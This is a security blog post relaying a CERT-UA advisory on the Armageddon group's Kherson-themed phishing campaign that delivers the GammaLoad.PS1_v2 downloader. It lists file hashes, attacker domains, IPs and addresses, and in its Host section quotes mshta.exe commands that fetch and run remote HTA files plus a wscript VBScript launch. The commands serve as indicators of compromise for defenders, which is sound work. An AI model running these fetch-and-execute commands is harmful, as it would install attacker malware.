Ukraine CERT-UA Reports a phishing campaign conducted by Armageddon APT

0
The government team for responding to computer emergencies in Ukraine CERT-UA received information about the fact of sending e-mails with subject "On revenge in Kherson!", Containing the “Plan Kherson.htm” attachment.
The HTM file will decode and create a "Herson.rar" file on the victim's computer, which contains the shortcut file "Plan of approach and planting explosives at critical infrastructure facilities in Kherson.lnk"
The mentioned LNK-file in case of its opening will provide loading and start of the HTA-file "precarious.xml" that will lead to creation and execution of files "desktop.txt" and "user.txt".
As a result, the malicious program GammaLoad.PS1_v2 will be downloaded to the computer (the mechanism of taking a screenshot and sending it to the management server has been implemented).The activity is carried out by the group UAC-0010 (Armageddon)
The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.

Files:

4c434fafbdb64ee9c56a4e3007b1ef33    b1bc659006938eb5912832eb8412c609d2d875c001ab411d1b69d343515291b7    План Херсон.htm
f94693b8def27e4555dc7ac6a25260d0    f9b68f9a3e41bafa612bcadd6e4c5ef75870549164e50f6b7ec55d1edad90674    Herson.rar
a367898f46c7a8ce0ba6d6e9690cc4b7    94f4b54060f50523380082879ac262e67477acf5656aec3912078e1d756e9f1f    План підходу та закладання вибухівки на об'єктах критичної інфростурктури Херсона.lnk
c3ad33e72e37f2f9ee1f901a9dab3660    370da0474afb87623e070b83834472c307089533796940fb8ebbe9c8cf048c93    rejection.xml
8993c593f70cc133dc70198052517c57    95eb176f66026aef579d515a5d2563dc2310eff038c68807c433b3418699f902    desktop.txt
d9041a202ef19a778817aed83f547010    000696f213103798767ad0ea47acf60d9d475c45de4584a0e8625067c1b89ba7    user.txt
c3c41fda9f83f579f3912ca4e769b634    3a0796096af51af33a28361670e9af8a9791b04c83025c0a904a36b3d1962c2e    get.php (GammaLoad.PS1_v2)


(10.05.2022)
fd49ac4b68e63ef4c44a08c05157b520    215d79d31ec6c4b008cf585dcf90007487b636229284b9ad924f52206c46a8a7    Витяг з наказу.htm 
9e472931556b6f6e3c1e50d719df83f9    f2f4dec274f0d7bd26c0d39e1cffc4b38b1e1919dfca6e20f754eddfa5931bbf    768_08.05.2022.rar
76bdfe083b9038ab35757ba8cfac9a97    7a36935f624855f21c03b17b9b6e652f9b400aec79f6d1f221ef7380f2f9c02e    Витяг з наказу Генерального штабу Збройних Сил України від 08.05.2022 №768.lnk
Network:
sendmail[.]website
a0671524.xsph[.]ru
a0667987.xsph[.]ru
qiwardos[.]ru
nitikora[.]ru
milotraf[.]ru
nikotod[.]ru
[email protected]
[email protected]
194[.]58.121.198 (Received)
92[.]53.116.145 (Received)
216[.]128.131.233
66[.]42.95.123
hXXp://qiwardos[.]ru/get.php
hXXp://qiwardos[.]ru/index.php
hXXp://a0671524.xsph[.]ru/mo/faicon.ico
hXXp://a0671524.xsph[.]ru/bandage/precarious.xml
hXXp://a0667987.xsph[.]ru/zsu/faicon.ico
hXXp://a0667987.xsph[.]ru/preparations/rejection.xml
hXXps://icanhazip[.]com (Легітимний сервіс)

Host:

%WINDIR%\System32\mshta.exe http://a0671524.xsph.ru/bandage/precarious.xml /f
%WINDIR%\System32\mshta.exe http://a0667987.xsph.ru/preparations/rejection.xml /f
cmd.exe /c wscript.exe %USERPROFILE%\desktop.txt //b //e:VBScript
%USERPROFILE%\desktop.txt

Source: https://cert.gov.ua/article/40240

Previous articleMapping MITRE ATT&CK with Window Event Log IDs
Next articleCyber Actors Steal Credit Card Data from the US Business
BalaGanesh
Balaganesh is a Incident Responder. Certified Ethical Hacker, Penetration Tester, Security blogger, Founder & Author of Soc Investigation.

LEAVE A REPLY

Please enter your comment!
Please enter your name here